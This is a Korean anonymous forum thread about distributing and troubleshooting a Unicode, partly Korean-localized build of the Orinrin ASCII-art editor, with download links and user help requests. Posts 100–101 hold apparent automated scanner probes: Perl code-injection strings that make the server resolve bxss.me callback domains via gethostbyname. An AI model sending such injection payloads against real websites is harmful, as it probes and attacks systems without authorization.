>1463548430> 오린린 에디터 유니코드 프로젝트 :: 110

익명의 참치 씨

2016-05-18 14:13:50 - 2024-07-23 01:21:13

0 이름 없음 (64609E+46)

2016-05-18 (水) 14:13:50

오린린 에디터를 유니코드로 인코딩하여 배포한다.
다운로드 링크는 매번 바뀔 예정이므로 컨트롤 + F "#다운로드"를 검색하여 가장 최근 포스트의 다운로드 링크를 따른다.

!중요: MSPGothic 폰트를 미리 설치해야한다.
제어판 -> 시계/언어/국가별 옵션 -> 언어 -> 언어 추가 -> 일본어
위와 같이 하면 자동으로 MSPGothic 폰트가 설치된다.

1차 배포
#다운로드: https://mega.nz/#!jxoiXAoI!VTrkjR3iT59ace_f_sUtl857wRSgTdr-ykSworxjDSc

1 이름 없음 (87028E+46)

2016-05-18 (水) 15:47:58

올려준거 봤는데 이쪽 글씨가 아예 사라졌던데?
AA만들 때 자주 쓰이는 글자들이 모인 곳인데 클릭해서 그 문자를 바로 넣어주는 기능이야.

2 이름 없음 (70856E+52)

2016-05-18 (水) 17:02:30

>>1
확인해볼게.

3 이름 없음 (70856E+52)

2016-05-18 (水) 18:28:36

글자가 깨지던 문제 해결.
집에 가서 빌드 후 배포

4 이름 없음 (admin)

2016-05-18 (水) 20:34:08

2차 배포
#다운로드: https://mega.nz/#!65gCFC6Y!jHNvCVp39prYnUMIrlxaNR-ocNHOIDzkXoPjosYowiQ

일본어가 깨지던 부분이 전부 제대로 출력됨.

5 이름 없음 (49302E+42)

2016-05-18 (水) 20:53:31

캔드민이었어?!

6 이름 없음 (admin)

2016-05-18 (水) 20:59:48

>>5
응. 오린린 에디터가 뭔지 궁굼해서 써보려고 했는데 앱로캘이 없으면 안된다고 하더라고.
찾아보니까 오픈소스길래 유니코드로 인코딩해서 앱로캘 없이 바로 실행할 수 있도록 만들었어.

7 이름 없음 (22962E+46)

2016-05-18 (水) 21:09:07

대단해, 캔드민! 우리가 못하는 일을 아무렇지도 않게 해버려!

8 이름 없음 (admin)

2016-05-18 (水) 23:17:08

우리말화.
메뉴나 설정 등을 조금 번역함.
번역이 이상한 부분은 직접 써보고 어떤 기능인지 말해줄 것.

3차 배포
#다운로드: https://mega.nz/#!7l4hmCLb!xodQAUV10doA1Kqu_GHGxb4x6oWTU8ECK5t6GwAWvQw

9 이름 없음 (87378E+54)

2016-05-19 (거의 끝나감) 00:15:43

우와아앗, 정말 고마워!
이번 기회에 오린린 에디터에 익숙해져볼게!

10 이름 없음 (80981E+56)

2016-05-19 (거의 끝나감) 07:35:14

....?!
뭐야 이게?!

11 이름 없음 (91948E+55)

2016-05-19 (거의 끝나감) 07:39:02

>>10
시작은 앱로캘 없이 돌리는 오린린 에디터.
근데 생각보다 너무 간단하게 끝나버려서 번역까지 하고 있다

12 이름 없음 (80981E+56)

2016-05-19 (거의 끝나감) 07:39:10

어느새 에디터가 한글화되고 어플로케일도 필요없어졌다?!

13 이름 없음 (82307E+51)

2016-05-19 (거의 끝나감) 13:46:55

인야앙!

14 이름 없음 (75721E+54)

2016-05-19 (거의 끝나감) 13:52:01

맥북에서 구동가능하게 할 수는 없나요 캔드민?

15 이름 없음 (43846E+52)

2016-05-19 (거의 끝나감) 16:12:13

>>14
불가능... c++인데다가 맥북도 없고...

16 이름 없음 (27227E+51)

2016-05-19 (거의 끝나감) 19:45:23

이미지 불러오기 기능 나만 안되는건가요!

17 이름 없음 (16573E+51)

2016-05-19 (거의 끝나감) 19:59:41

>>16 이미지 불러오는 경로에 한글이 있으면 안돼.

18 이름 없음 (27227E+51)

2016-05-19 (거의 끝나감) 20:25:43

>>17
그게 아니라 트레이스 모드? 그거 눌러도 그거 창이 안뜨더라고....

19 이름 없음 (admin)

2016-05-19 (거의 끝나감) 20:47:44

>>16-18
imgctl.dll이 없어서 그래.
없어도 돌아가길래 필요 없는 줄 알았는데 트레이스 모드에 쓰는 거였군...

아래 dll 파일을 오린린에디터 폴더에 넣으면 될거야.
imgctl.dll
#다운로드(부속): https://mega.nz/#!eh4hFabT!yi0SuFSRzmKr_VI3U5W0J6QwKxhHWaHPKn1H8W2j55w

20 이름 없음 (57245E+57)

2016-05-22 (내일 월요일) 02:39:37

이런 게 있었구나. 굉장해. 고마워 운영자

21 이름 없음 (77039E+57)

2016-05-22 (내일 월요일) 11:50:09

캔드민 정말 캔드민!

22 이름 없음 (73688E+56)

2016-05-24 (FIRE!) 01:26:49

어플로케일 없이 그냥 실행하면 일웹에서 받은 mlt파일이 깨져서 나와.
어플로케일로 실행하면 제대로 나오고. 그리고 프레임삽입의 서식들이 어플로케일 적용 여부와 관계없이 1~20번이 다 똑같아.
MSP고딕 폰트도 설치되어 있는데 왜 그런지 모르겠네.

그래도 프레임서식만 안쓰면 메뉴한글화 되있는 것만으로도 엄청 편하네!

23 이름 없음 (12227E+57)

2016-05-24 (FIRE!) 07:23:58

>>22
프레임 서식은 개인적으로 바꿀 수 있어. 메뉴 찾아보면 나올 거야.
mlt파일이 깨지는 문제는 확인을 해봐야겠네.

24 이름 없음 (04686E+54)

2016-05-28 (파란날) 12:17:42

인양

25 이름 없음 (94969E+59)

2016-06-15 (水) 00:45:13

인양

26 이름 없음 (74786E+56)

2016-07-05 (FIRE!) 17:21:11

인양

27 이름 없음 (34355E+65)

2016-07-24 (내일 월요일) 18:42:57

인양

28 이름 없음 (70384E+58)

2016-08-13 (파란날) 17:26:17

인양

29 32비트 (89284E+62)

2016-08-21 (내일 월요일) 02:49:19

캔드민님...!!
....
파일을 쓰고싶어요....

30 이름 없음 (23502E+63)

2016-08-21 (내일 월요일) 13:34:14

>>29
무슨 말이야?

31 이름 없음 (3132E+59)

2016-08-25 (거의 끝나감) 17:19:38

>>30
32비트 컴퓨터인데 파일 실행했을때 올바른 win32응용프로그램이 아니라고 뜬다..
파일 개조중에 64비트용이 된듯

32 이름 없음 (0578E+60)

2016-09-28 (水) 22:46:23

인양

33 이름 없음 (40098E+58)

2016-10-22 (파란날) 00:13:07

늦게 봤지만 캔드민 사랑합니다

34 이름 없음 (12083E+57)

2016-11-16 (水) 23:45:29

이거 다운받았는데 올바른 'win32 응용프로그램이 아닙니다' 라고 떠요. 어떻게 하면 되나요?

35 이름 없음 (99368E+65)

2016-12-26 (모두 수고..) 00:14:03

인양!

36 이름 없음 (7929124E+5)

2017-01-17 (FIRE!) 11:01:48

인양!

37 이름 없음 (2529842E+6)

2017-01-17 (FIRE!) 12:45:49

이런 게 있었나.

38 이름 없음 (1514244E+7)

2017-05-15 (모두 수고..) 00:55:10

인양!

39 이름 없음 (3887294E+5)

2017-05-21 (내일 월요일) 01:39:54

인양

40 이름 없음 (4758409E+6)

2017-08-29 (FIRE!) 19:32:51

감사합니다 잘 쓰겠습니다

41 이름 없음 (6358376E+6)

2018-01-20 (파란날) 15:54:20

오린린을 다운로드하는 사람이 오늘도 한 명 여기에 있다!

42 이름 없음 (4146569E+6)

2018-01-20 (파란날) 20:04:16

여기 한명 더 있다!

43 이름 없음 (0886604E+6)

2018-01-31 (水) 01:19:58

감사합니다!

44 이름 없음 (7004586E+5)

2018-02-04 (내일 월요일) 21:21:32

인양

45 이름 없음 (6277033E+6)

2018-02-10 (파란날) 12:25:07

감사합니다!

46 이름 없음 (6058905E+6)

2018-02-25 (내일 월요일) 10:57:48

인양.

47 이름 없음 (8410958E+6)

2018-03-12 (모두 수고..) 19:11:19

인양 겸 해결책 문의...
ctrl+B 기능이 원래 오린린에서는 되는데 유니코드 버전에서는 안됩니다
해결책을 구합니다 ㅠ

48 이름 없음 (4177927E+6)

2018-03-19 (모두 수고..) 20:37:30

끌올

49 이름 없음 (2458833E+6)

2018-05-05 (파란날) 18:25:43

언제나 감사의 인양.

50 이름 없음 (0643359E+6)

2018-05-07 (모두 수고..) 02:17:09

3차 배포
#다운로드: https://mega.nz/#!7l4hmCLb!xodQAUV10doA1Kqu_GHGxb4x6oWTU8ECK5t6GwAWvQw

imgctl.dll
#다운로드(부속): https://mega.nz/#!eh4hFabT!yi0SuFSRzmKr_VI3U5W0J6QwKxhHWaHPKn1H8W2j55w

인양할떄는 묻히지 않게 배포주소와 함꼐 ! !

51 이름 없음 (9616165E+5)

2018-05-31 (거의 끝나감) 21:10:11

감사합니다!

52 이름 없음 (8558979E+6)

2018-09-02 (내일 월요일) 19:03:40

일단 인양을 걸어볼까. 뭔가 사라진 느낌이지만

53 이름 없음 (3450946E+5)

2018-10-05 (불탄다..!) 18:45:40

감사합니다!

54 이름 없음 (0492592E+6)

2019-04-18 (거의 끝나감) 18:47:52

55 이름 없음 (9657048E+5)

2019-05-02 (거의 끝나감) 16:24:05

3차 배포

imgctl.dll

56 이름 없음 (1382351E+6)

2019-05-02 (거의 끝나감) 16:39:26

업데이트?

57 이름 없음 (1382351E+6)

2019-05-02 (거의 끝나감) 16:40:00

아니네

58 이름 없음 (CoxgbeRcRc)

2021-01-17 (내일 월요일) 18:20:01

이게 없었으면 어땠을지 ㄷ 감사합니다

59 이름 없음 (CupgW.uhpM)

2021-06-03 (거의 끝나감) 08:35:34

참치 메인에 걸려있는 링크가 오류로 떠가지고 인양.

63 이름 없음 (lhKbJhMCB6)

2022-06-06 (모두 수고..) 20:34:26

3차 배포

imgctl.dll

인양이다!

65 이름 없음 (k81UDl9yEY)

2022-07-24 (내일 월요일) 18:23:46

오린린 에디터에서 트레이스 모드를 쓰려는데, 사진이 올라가지를 않습니다. 이유가 뭘까요? 맞춰야 되는 형식이 있나요?

66 이름 없음 (vV.IetdZ1U)

2022-07-24 (내일 월요일) 18:31:06

>>65 >>16-19

67 이름 없음 (/dIDxRbyX.)

2022-08-18 (거의 끝나감) 17:10:06

왜 안되는 걸까

68 이름 없음 (kYaBEpY4ek)

2022-08-18 (거의 끝나감) 17:25:26

뭐가 안되는지부터 설명을 좀 해... 그냥 안된다고 하면 못도와줘...

69 이름 없음 (/dIDxRbyX.)

2022-08-18 (거의 끝나감) 17:32:37

다운로드 했는데 실행하는 아이콘 자체가 사라진다

70 이름 없음 (/dIDxRbyX.)

2022-08-18 (거의 끝나감) 17:35:32

옛날에 쓰던 노트북에서는 잘 사용되는데
PC에서는 아이콘이 연결 프로그램 창이 뜬다거나
실행 아이콘이 없던가 그러네요

71 이름 없음 (MzNi8hgdwg)

2022-08-18 (거의 끝나감) 17:40:18

넷 프레임워크 혹은 다이렉트 x 다운로드.
이거 아님 잘 모르겠음.

72 이름 없음 (MzNi8hgdwg)

2022-08-18 (거의 끝나감) 17:41:35

https://kindangel.tistory.com/267
아님 이거대로.

75 이름 없음 (xU45f1PodE)

2023-11-24 (불탄다..!) 17:02:57

어우 씨 깜짝이야 광고새끼 다시 왔네ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ

80 이름 없음 (Kbmz2xv85I)

2023-12-25 (모두 수고..) 13:27:20

현재 3차 배포 링크가 폐쇄된 상황입니다

81 이름 없음 (Kbmz2xv85I)

2023-12-25 (모두 수고..) 13:27:35

복구 가능할까요?

90 이름 없음 (Q7PEElB29Y)

2024-01-10 (水) 01:39:59

https://github.com/tunaground/OrinrinEditor/releases/download/0.341/OrinrinEditor-x86-Release.zip

번역은 안되어있음. 하지만 돌아갈 거임.
윈도우 11에서 돌아감.

번역은 나중에 시간이 남으면 해주겠음.

96 CpjJwWHV (n3NUFvbvo2)

2024-05-12 (내일 월요일) 08:15:02

97 CpjJwWHV (n3NUFvbvo2)

2024-05-12 (내일 월요일) 08:15:08

98 CpjJwWHV (n3NUFvbvo2)

2024-05-12 (내일 월요일) 08:15:09

99 CpjJwWHV (n3NUFvbvo2)

2024-05-12 (내일 월요일) 08:15:10

100 CpjJwWHV (n3NUFvbvo2)

2024-05-12 (내일 월요일) 08:15:12

'.gethostbyname(lc('hitna'.'iasahjgn1c203.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(75).chr(105).chr(68).'

101 CpjJwWHV (n3NUFvbvo2)

2024-05-12 (내일 월요일) 08:15:14

".gethostbyname(lc("hitfw"."gsfqnqbs8c266.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(66).chr(100).chr(85)."

102 CpjJwWHV (n3NUFvbvo2)

2024-05-12 (내일 월요일) 08:15:29

103 CpjJwWHV (n3NUFvbvo2)

2024-05-12 (내일 월요일) 08:15:31

104 CpjJwWHV (n3NUFvbvo2)

2024-05-12 (내일 월요일) 08:15:32

105 CpjJwWHV (n3NUFvbvo2)

2024-05-12 (내일 월요일) 08:15:33

106 CpjJwWHV (n3NUFvbvo2)

2024-05-12 (내일 월요일) 08:16:09

107 CpjJwWHV (n3NUFvbvo2)

2024-05-12 (내일 월요일) 08:16:12

108 이름 없음 (ohTPfjvtRk)

2024-07-22 (모두 수고..) 16:33:35

링크에 파일 사라진 것 같은데 다시 올려줄 수 있을까.. ㅠㅠ

109 이름 없음 (Y53gl1hLCA)

2024-07-22 (모두 수고..) 16:45:00

>>108
캔드민 번역 버전은 아닌데 일본어판 오린린 링크는 있음

https://ux.getuploader.com/yaruo_picture/download/431

110 이름 없음 (dEww3.kfm2)

2024-07-23 (FIRE!) 01:21:13

>>109
감사합니다 !!!